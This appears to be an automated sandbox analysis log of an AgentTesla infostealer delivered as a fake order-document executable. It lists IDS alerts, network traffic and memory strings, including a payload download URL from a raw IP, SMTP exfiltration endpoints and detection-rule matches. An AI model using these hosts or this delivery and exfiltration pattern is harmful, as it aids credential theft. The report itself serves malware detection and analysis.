            Source: TrafficSnort IDS: 2840032 ETPRO TROJAN Win32/AgentTesla/OriginLogger Data Exfil via SMTP M2 192.168.11.20:49842 -> 208.91.199.224:587
            Source: TrafficSnort IDS: 2030171 ET TROJAN AgentTesla Exfil Via SMTP 192.168.11.20:49842 -> 208.91.199.224:587
            Source: TrafficSnort IDS: 2839723 ETPRO TROJAN Win32/Agent Tesla SMTP Activity 192.168.11.20:49842 -> 208.91.199.224:587
            Source: Joe Sandbox ViewIP Address: 103.156.93.29 103.156.93.29
            Source: global trafficHTTP traffic detected: GET /GpqoIwsbfqqIcl84.xtp HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: 103.156.93.29Cache-Control: no-cache
            Source: global trafficTCP traffic: 192.168.11.20:49842 -> 208.91.199.224:587
            Source: global trafficTCP traffic: 192.168.11.20:49842 -> 208.91.199.224:587
            Source: unknownTCP traffic detected without corresponding DNS query: 103.156.93.29
            Source: unknownTCP traffic detected without corresponding DNS query: 103.156.93.29
            Source: unknownTCP traffic detected without corresponding DNS query: 103.156.93.29
            Source: unknownTCP traffic detected without corresponding DNS query: 103.156.93.29
            Source: unknownTCP traffic detected without corresponding DNS query: 103.156.93.29
            Source: unknownTCP traffic detected without corresponding DNS query: 103.156.93.29
            Source: unknownTCP traffic detected without corresponding DNS query: 103.156.93.29
            Source: unknownTCP traffic detected without corresponding DNS query: 103.156.93.29
            Source: unknownTCP traffic detected without corresponding DNS query: 103.156.93.29
            Source: unknownTCP traffic detected without corresponding DNS query: 103.156.93.29
            Source: unknownTCP traffic detected without corresponding DNS query: 103.156.93.29
            Source: unknownTCP traffic detected without corresponding DNS query: 103.156.93.29
            Source: unknownTCP traffic detected without corresponding DNS query: 103.156.93.29
            Source: unknownTCP traffic detected without corresponding DNS query: 103.156.93.29
            Source: unknownTCP traffic detected without corresponding DNS query: 103.156.93.29
            Source: unknownTCP traffic detected without corresponding DNS query: 103.156.93.29
            Source: unknownTCP traffic detected without corresponding DNS query: 103.156.93.29
            Source: unknownTCP traffic detected without corresponding DNS query: 103.156.93.29
            Source: unknownTCP traffic detected without corresponding DNS query: 103.156.93.29
            Source: unknownTCP traffic detected without corresponding DNS query: 103.156.93.29
            Source: unknownTCP traffic detected without corresponding DNS query: 103.156.93.29
            Source: unknownTCP traffic detected without corresponding DNS query: 103.156.93.29
            Source: unknownTCP traffic detected without corresponding DNS query: 103.156.93.29
            Source: unknownTCP traffic detected without corresponding DNS query: 103.156.93.29
            Source: unknownTCP traffic detected without corresponding DNS query: 103.156.93.29
            Source: unknownTCP traffic detected without corresponding DNS query: 103.156.93.29
            Source: unknownTCP traffic detected without corresponding DNS query: 103.156.93.29
            Source: unknownTCP traffic detected without corresponding DNS query: 103.156.93.29
            Source: unknownTCP traffic detected without corresponding DNS query: 103.156.93.29
            Source: unknownTCP traffic detected without corresponding DNS query: 103.156.93.29
            Source: unknownTCP traffic detected without corresponding DNS query: 103.156.93.29
            Source: unknownTCP traffic detected without corresponding DNS query: 103.156.93.29
            Source: unknownTCP traffic detected without corresponding DNS query: 103.156.93.29
            Source: unknownTCP traffic detected without corresponding DNS query: 103.156.93.29
            Source: unknownTCP traffic detected without corresponding DNS query: 103.156.93.29
            Source: unknownTCP traffic detected without corresponding DNS query: 103.156.93.29
            Source: unknownTCP traffic detected without corresponding DNS query: 103.156.93.29
            Source: unknownTCP traffic detected without corresponding DNS query: 103.156.93.29
            Source: unknownTCP traffic detected without corresponding DNS query: 103.156.93.29
            Source: unknownTCP traffic detected without corresponding DNS query: 103.156.93.29
            Source: unknownTCP traffic detected without corresponding DNS query: 103.156.93.29
            Source: unknownTCP traffic detected without corresponding DNS query: 103.156.93.29
            Source: unknownTCP traffic detected without corresponding DNS query: 103.156.93.29
            Source: unknownTCP traffic detected without corresponding DNS query: 103.156.93.29
            Source: unknownTCP traffic detected without corresponding DNS query: 103.156.93.29
            Source: unknownTCP traffic detected without corresponding DNS query: 103.156.93.29
            Source: unknownTCP traffic detected without corresponding DNS query: 103.156.93.29
            Source: unknownTCP traffic detected without corresponding DNS query: 103.156.93.29
            Source: unknownTCP traffic detected without corresponding DNS query: 103.156.93.29
            Source: unknownTCP traffic detected without corresponding DNS query: 103.156.93.29
            Source: CasPol.exe, 00000097.00000002.67445839511.000000001D63E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: subdomain_match":["go","tv"]},{"applied_policy":"EdgeUA","domain":"video.zhihu.com"},{"applied_policy":"ChromeUA","domain":"la7.it"},{"applied_policy":"ChromeUA","domain":"ide.cs50.io"},{"applied_policy":"ChromeUA","domain":"moneygram.com"},{"applied_policy":"ChromeUA","domain":"blog.esuteru.com"},{"applied_policy":"ChromeUA","domain":"online.tivo.com","path_match":["/start"]},{"applied_policy":"ChromeUA","domain":"smallbusiness.yahoo.com","path_match":["/businessmaker"]},{"applied_policy":"ChromeUA","domain":"jeeready.amazon.in","path_match":["/home"]},{"applied_policy":"ChromeUA","domain":"abc.com"},{"applied_policy":"ChromeUA","domain":"mvsrec738.examly.io"},{"applied_policy":"ChromeUA","domain":"myslate.sixphrase.com"},{"applied_policy":"ChromeUA","domain":"search.norton.com","path_match":["/nsssOnboarding"]},{"applied_policy":"ChromeUA","domain":"checkdecide.com"},{"applied_policy":"ChromeUA","domain":"virtualvisitlogin.partners.org"},{"applied_policy":"ChromeUA","domain":"carelogin.bryantelemedicine.com"},{"applied_policy":"ChromeUA","domain":"providerstc.hs.utah.gov"},{"applied_policy":"ChromeUA","domain":"applychildcaresubsidy.alberta.ca"},{"applied_policy":"ChromeUA","domain":"elearning.evn.com.vn","path_match":["/login"]},{"applied_policy":"ChromeUA","domain":"telecare.keckmedicine.org"},{"applied_policy":"ChromeUA","domain":"authoring.amirsys.com","path_match":["/login"]},{"applied_policy":"ChromeUA","domain":"elearning.seabank.com.vn","path_match":["/login"]},{"applied_policy":"ChromeUA","domain":"app.fields.corteva.com","path_match":["/login"]},{"applied_policy":"ChromeUA","domain":"gsq.minornet.com"},{"applied_policy":"ChromeUA","domain":"shop.lic.co.nz"},{"applied_policy":"ChromeUA","domain":"telehealthportal.uofuhealth.org"},{"applied_policy":"ChromeUA","domain":"portal.centurylink.com"},{"applied_policy":"ChromeUA","domain":"visitnow.org"},{"applied_policy":"ChromeUA","domain":"www.hotstar.com","path_match":["/in/subscribe/payment/methods/dc","/in/subscribe/payment/methods/cc"]},{"applied_policy":"ChromeUA","domain":"tryca.st","path_match":["/studio","/publisher"]},{"applied_policy":"ChromeUA","domain":"telemost.yandex.ru"},{"applied_policy":"ChromeUA","domain":"astrogo.astro.com.my"},{"applied_policy":"ChromeUA","domain":"airbornemedia.gogoinflight.com"},{"applied_policy":"ChromeUA","domain":"itoaxaca.mindbox.app"},{"applied_policy":"ChromeUA","domain":"app.classkick.com"},{"applied_policy":"ChromeUA","domain":"exchangeservicecenter.com","path_match":["/freeze"]},{"applied_policy":"ChromeUA","domain":"bancodeoccidente.com.co","path_match":["/portaltransaccional"]},{"applied_policy":"ChromeUA","domain":"better.com"},{"applied_policy":"IEUA","domain":"bm.gzekao.cn","path_match":["/tr/webregister/"]},{"applied_policy":"ChromeUA","domain":"scheduling.care.psjhealth.org","path_match":["/virtual"]},{"applied_policy":"ChromeUA","domain":"salud.go.cr"},{"applied_policy":"ChromeUA","domain":"learning.chungdahm.com"},{"applied_policy":"C
            Source: CasPol.exe, 00000097.00000002.67423180687.0000000001068000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://103.156.93.29/GpqoIwsbfqqIcl84.xtp
            Source: CasPol.exe, 00000097.00000002.67423180687.0000000001068000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://103.156.93.29/GpqoIwsbfqqIcl84.xtpHVs
            Source: CasPol.exe, 00000097.00000002.67443276840.000000001D4B1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://127.0.0.1:HTTP/1.1
            Source: CasPol.exe, 00000097.00000002.67443276840.000000001D4B1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://DynDns.comDynDNS
            Source: CasPol.exe, 00000097.00000002.67443276840.000000001D4B1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://lgHVjR.com
            Source: Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exeString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
            Source: CasPol.exe, 00000097.00000002.67446563773.000000001D6AC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://smtp.jubana.cam
            Source: CasPol.exe, 00000097.00000002.67446563773.000000001D6AC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://us2.smtp.mailhostbox.com
            Source: CasPol.exe, 00000097.00000002.67445839511.000000001D63E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://3k8kPNo7ce8FL.com
            Source: CasPol.exe, 00000097.00000002.67445612440.000000001D618000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://3k8kPNo7ce8FL.comt-
            Source: CasPol.exe, 00000097.00000002.67444954636.000000001D5AF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/
            Source: CasPol.exe, 00000097.00000002.67444954636.000000001D5AF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://login.live.com//
            Source: CasPol.exe, 00000097.00000002.67444954636.000000001D5AF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/https://login.live.com/
            Source: CasPol.exe, 00000097.00000002.67444954636.000000001D5AF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/v104
            Source: CasPol.exe, 00000097.00000002.67444954636.000000001D5AF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.google.com/chrome/?p=plugin_flash
            Source: CasPol.exe, 00000097.00000002.67443276840.000000001D4B1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha
            Source: unknownDNS traffic detected: queries for: smtp.jubana.cam
            Source: global trafficHTTP traffic detected: GET /GpqoIwsbfqqIcl84.xtp HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: 103.156.93.29Cache-Control: no-cache
            Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exeCode function: 1_2_004052D0 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,1_2_004052D0
            Source: conhost.exeProcess created: 81

            System Summary

            barindex
            Source: 00000097.00000002.67443276840.000000001D4B1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
            Source: Process Memory Space: CasPol.exe PID: 6756, type: MEMORYSTRMatched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
            Source: initial sampleStatic PE information: Filename: Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe
            Source: initial sampleStatic PE information: Filename: Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe
            Source: Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exeStatic file information: Suspicious name
            Source: Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
            Source: 00000097.00000002.67443276840.000000001D4B1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
            Source: Process Memory Space: CasPol.exe PID: 6756, type: MEMORYSTRMatched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
            Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exeCode function: 1_2_0040327D EntryPoint,SetErrorMode,GetVersion,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,1_2_0040327D
            Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exeCode function: 1_2_00404B0D1_2_00404B0D
            Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exeCode function: 1_2_02FAE63C1_2_02FAE63C
            Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exeCode function: 1_2_02FAD2111_2_02FAD211
            Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exeCode function: 1_2_02FA1AFD1_2_02FA1AFD
            Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exeCode function: 1_2_02FA0AF31_2_02FA0AF3
            Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exeCode function: 1_2_02FA16E91_2_02FA16E9
            Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exeCode function: 1_2_02FA16D71_2_02FA16D7
            Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exeCode function: 1_2_02FA0EB81_2_02FA0EB8
            Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exeCode function: 1_2_02FA1ABE1_2_02FA1ABE
            Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exeCode function: 1_2_02FA0AB51_2_02FA0AB5
            Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exeCode function: 1_2_02FA1A881_2_02FA1A88
            Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exeCode function: 1_2_02FA068E1_2_02FA068E
            Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exeCode function: 1_2_02FA56711_2_02FA5671
            Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exeCode function: 1_2_02FA86751_2_02FA8675
            Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exeCode function: 1_2_02FA0E5A1_2_02FA0E5A
            Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exeCode function: 1_2_02FA1A501_2_02FA1A50
            Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exeCode function: 1_2_02FA02481_2_02FA0248
            Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exeCode function: 1_2_02FA06481_2_02FA0648
            Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exeCode function: 1_2_02FA8A451_2_02FA8A45
            Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exeCode function: 1_2_02FAE2291_2_02FAE229
            Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exeCode function: 1_2_02FA66091_2_02FA6609
            Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exeCode function: 1_2_02FA1E001_2_02FA1E00
            Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exeCode function: 1_2_02FA1A041_2_02FA1A04
            Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exeCode function: 1_2_02FA1BF21_2_02FA1BF2
            Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exeCode function: 1_2_02FA17DB1_2_02FA17DB
            Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exeCode function: 1_2_02FA07DC1_2_02FA07DC
            Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exeCode function: 1_2_02FA03C71_2_02FA03C7
            Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exeCode function: 1_2_02FA1BBC1_2_02FA1BBC
            Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exeCode function: 1_2_02FA0BB11_2_02FA0BB1
            Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exeCode function: 1_2_02FA17AB1_2_02FA17AB
            Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exeCode function: 1_2_02FA07911_2_02FA0791
            Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exeCode function: 1_2_02FA038D1_2_02FA038D
            Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exeCode function: 1_2_02FA1B741_2_02FA1B74
            Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exeCode function: 1_2_02FA0B631_2_02FA0B63
            Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exeCode function: 1_2_02FA17671_2_02FA1767
            Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exeCode function: 1_2_02FA03491_2_02FA0349
            Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exeCode function: 1_2_02FA0B331_2_02FA0B33
            Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exeCode function: 1_2_02FA17341_2_02FA1734
            Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exeCode function: 1_2_02FA0F2C1_2_02FA0F2C
            Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exeCode function: 1_2_02FA872C1_2_02FA872C
            Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exeCode function: 1_2_02FA07101_2_02FA0710
            Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exeCode function: 1_2_02FA03071_2_02FA0307
            Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exeCode function: 1_2_02FA64E31_2_02FA64E3
            Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exeCode function: 1_2_02FA0CE11_2_02FA0CE1
            Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exeCode function: 1_2_02FA04DE1_2_02FA04DE
            Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exeCode function: 1_2_02FA00C81_2_02FA00C8
            Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exeCode function: 1_2_02FAE0CC1_2_02FAE0CC
            Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exeCode function: 1_2_02FA08B71_2_02FA08B7
            Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exeCode function: 1_2_02FA04A91_2_02FA04A9
            Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exeCode function: 1_2_02FA58AD1_2_02FA58AD
            Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exeCode function: 1_2_02FA1CA21_2_02FA1CA2
            Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exeCode function: 1_2_02FA0C9E1_2_02FA0C9E
            Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exeCode function: 1_2_02FA18921_2_02FA1892
            Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exeCode function: 1_2_02FA18951_2_02FA1895
            Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exeCode function: 1_2_02FA088A1_2_02FA088A
            Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exeCode function: 1_2_02FA00881_2_02FA0088
            Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exeCode function: 1_2_02FA5C861_2_02FA5C86
            Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exeCode function: 1_2_02FA0C721_2_02FA0C72
            Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exeCode function: 1_2_02FA046A1_2_02FA046A
            Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exeCode function: 1_2_02FA646B1_2_02FA646B
            Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exeCode function: 1_2_02FA606B1_2_02FA606B
            Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exeCode function: 1_2_02FA185C1_2_02FA185C
            Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exeCode function: 1_2_02FA00451_2_02FA0045
            Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exeCode function: 1_2_02FA04381_2_02FA0438
            Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exeCode function: 1_2_02FA1C391_2_02FA1C39
            Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exeCode function: 1_2_02FA60391_2_02FA6039
            Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exeCode function: 1_2_02FA002F1_2_02FA002F
            Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exeCode function: 1_2_02FA0C261_2_02FA0C26
            Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exeCode function: 1_2_02FA18131_2_02FA1813
            Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exeCode function: 1_2_02FA8C161_2_02FA8C16
            Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exeCode function: 1_2_02FA04031_2_02FA0403
            Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exeCode function: 1_2_02FA01FE1_2_02FA01FE
            Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exeCode function: 1_2_02FA0DFF1_2_02FA0DFF
            Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exeCode function: 1_2_02FA09E61_2_02FA09E6
            Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exeCode function: 1_2_02FA05E51_2_02FA05E5
            Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exeCode function: 1_2_02FAF1DA1_2_02FAF1DA
            Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exeCode function: 1_2_02FA25DB1_2_02FA25DB
            Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exeCode function: 1_2_02FA19D01_2_02FA19D0
            Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exeCode function: 1_2_02FA0DD01_2_02FA0DD0
            Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exeCode function: 1_2_02FA01CE1_2_02FA01CE
            Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exeCode function: 1_2_02FA05B21_2_02FA05B2
            Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exeCode function: 1_2_02FA09AA1_2_02FA09AA
            Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exeCode function: 1_2_02FA19A31_2_02FA19A3
            Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exeCode function: 1_2_02FA0D971_2_02FA0D97
            Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exeCode function: 1_2_02FA19721_2_02FA1972
            Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exeCode function: 1_2_02FA09731_2_02FA0973
            Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exeCode function: 1_2_02FA25751_2_02FA2575
            Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exeCode function: 1_2_02FA0D641_2_02FA0D64
            Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exeCode function: 1_2_02FA055F1_2_02FA055F
            Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exeCode function: 1_2_02FA014A1_2_02FA014A
            Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exeCode function: 1_2_02FA193C1_2_02FA193C
            Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exeCode function: 1_2_02FA092F1_2_02FA092F
            Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exeCode function: 1_2_02FA05191_2_02FA0519
            Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exeCode function: 1_2_02FA0D151_2_02FA0D15
            Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exeCode function: 1_2_02FA010C1_2_02FA010C
            Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exeCode function: 1_2_02FA19071_2_02FA1907
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 151_2_013751E8151_2_013751E8
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 151_2_0137E030151_2_0137E030
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 151_2_01377818151_2_01377818
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 151_2_0137E898151_2_0137E898
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 151_2_01373330151_2_01373330
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 151_2_01379B42151_2_01379B42
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 151_2_01378208151_2_01378208
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 151_2_01371D28151_2_01371D28
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 151_2_01497178151_2_01497178
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 151_2_01493018151_2_01493018
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 151_2_014904D8151_2_014904D8
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 151_2_0149C7D0151_2_0149C7D0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 151_2_01499678151_2_01499678
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 151_2_01495E38151_2_01495E38
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 151_2_0149B310151_2_0149B310
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 151_2_0149DEF0151_2_0149DEF0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 151_2_0154A0A0151_2_0154A0A0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 151_2_01540B58151_2_01540B58
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 151_2_01544078151_2_01544078
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 151_2_0154B308151_2_0154B308
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 151_2_1D305E08151_2_1D305E08
